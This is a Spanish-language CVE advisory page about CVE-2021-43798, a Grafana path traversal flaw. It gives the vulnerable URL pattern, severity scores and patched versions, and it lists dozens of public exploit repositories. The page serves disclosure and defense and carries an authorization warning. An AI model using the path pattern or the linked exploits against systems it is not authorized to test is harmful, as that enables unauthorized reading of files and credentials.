← volver
CVE-2021-43798

Grafana path traversal

CVSS 7.5 HIGHEPSS 88.8%● KEVCWE-22
En resumen

Grafana versiones 8.0-8.3 tiene un defecto que permite a los atacantes acceder a archivos del servidor manipulando la ruta URL del plugin. Esto omite los controles de acceso normales y podría exponer datos sensibles como archivos de configuración o credenciales.

Detalle técnico

Vulnerabilidad de path traversal en el endpoint público de plugins de Grafana permite que atacantes no autenticados lean archivos arbitrarios mediante secuencias de traversal de directorio en el parámetro de ID del plugin. La vulnerabilidad afecta a las versiones 8.0.0-beta1 hasta 8.3.0 (excluyendo versiones parcheadas) y requiere solo acceso de red al endpoint vulnerable.

Resumen generado y traducido por IA a partir de la descripción oficial.
Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) iss vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: `<grafana_host_url>/public/plugins//`, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Productos afectados
grafana · grafana
PoCs públicas encontradas53
githubgithub.com/jas502n/Grafana-CVE-2021-43798368githubgithub.com/A-D-Team/grafanaExp268githubgithub.com/pedrohavay/exploit-grafana-CVE-2021-4379846githubgithub.com/taythebot/CVE-2021-4379841githubgithub.com/zer0yu/CVE-2021-4379827githubgithub.com/Mr-xn/CVE-2021-4379824githubgithub.com/MoCh3n/CVE-2021-43798-grafana_fileread17githubgithub.com/ScorpionsMAX/CVE-2021-43798-Grafana-POC14githubgithub.com/asaotomo/CVE-2021-43798-Grafana-Exp12githubgithub.com/Mo0ns/Grafana_POC-CVE-2021-437989githubgithub.com/Sic4rio/Grafana-Decryptor-for-CVE-2021-437988githubgithub.com/kenuosec/grafanaExp6githubgithub.com/z3n70/CVE-2021-437985githubgithub.com/K3ysTr0K3R/CVE-2021-43798-EXPLOIT4githubgithub.com/s1gh/CVE-2021-437984githubgithub.com/hupe1980/CVE-2021-437983githubgithub.com/0xSAZZAD/Grafana-CVE-2021-437983githubgithub.com/wezoomagency/GrafXploit3githubgithub.com/Ryze-T/CVE-2021-437982githubgithub.com/fanygit/Grafana-CVE-2021-43798Exp2githubgithub.com/monke443/CVE-2021-437982githubgithub.com/lfz97/CVE-2021-43798-Grafana-File-Read1githubgithub.com/LongWayHomie/CVE-2021-437981githubgithub.com/k3rwin/CVE-2021-43798-Grafana1githubgithub.com/Jroo1053/GrafanaDirInclusion1githubgithub.com/FAOG99/GrafanaDirectoryScanner1githubgithub.com/wagneralves/CVE-2021-437981githubgithub.com/Strikoder-Premium/Grafana-Password-Decryptor1githubgithub.com/Asbawy/GrafTraverse-CVE-2021-437980githubgithub.com/katseyres2/CVE-2021-437980githubgithub.com/Iris288/CVE-2021-437980githubgithub.com/Okymi-X/CVE-2021-437980githubgithub.com/halencarjunior/grafana-CVE-2021-437980githubgithub.com/ticofookfook/CVE-2021-437980githubgithub.com/MalekAlthubiany/CVE-2021-437980githubgithub.com/gixxyboy/CVE-2021-437980githubgithub.com/hxlxmj/Grafxploit0githubgithub.com/G01d3nW01f/CVE-2021-437980githubgithub.com/mauricelambert/LabAutomationCVE-2021-437980githubgithub.com/victorhorowitz/grafana-exploit-CVE-2021-437980githubgithub.com/JiuBanSec/Grafana-CVE-2021-437980githubgithub.com/davidrxchester/Grafana-8.3-Directory-Traversal0githubgithub.com/ravi5hanka/CVE-2021-43798-Exploit-for-Windows-and-Linux0githubgithub.com/suljov/Grafana-LFI-exploit0githubgithub.com/abuyazeen/CVE-2021-43798-Grafana-path-traversal-tester0githubgithub.com/0xf3d0rq/CVE-2021-437980githubgithub.com/baktistr/cve-2021-43798-enum0githubgithub.com/notbside/CVE-2021-43798-PoC0githubgithub.com/Shoxake17/CVE-2021-437980githubgithub.com/kikechans/-Grafana-LFI-CVE-2021-437980cve_referencepacketstormsecurity.com/files/165198/Grafana-Arbitrary-File-Reading.htmlno verificadoexploitdbwww.exploit-db.com/exploits/50581no verificadocve_referencepacketstormsecurity.com/files/165221/Grafana-8.3.0-Directory-Traversal-Arbitrary-File-Read.htmlno verificado
⚠ Recursos públicos, para evaluar la exposición de sistemas que controlas o estás autorizado a probar. Prueba solo con autorización.

¿Quieres saber si tu infraestructura está expuesta a esto?

Hablar con TrueHacking →
Referencias
http://packetstormsecurity.com/files/165198/Grafana-Arbitrary-File-Reading.htmlhttp://packetstormsecurity.com/files/165221/Grafana-8.3.0-Directory-Traversal-Arbitrary-File-Read.htmlhttps://github.com/grafana/grafana/commit/c798c0e958d15d9cc7f27c72113d572fa58545cehttps://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47phttps://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/https://security.netapp.com/advisory/ntap-20211229-0004/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-43798http://www.openwall.com/lists/oss-security/2021/12/09/2http://www.openwall.com/lists/oss-security/2021/12/10/4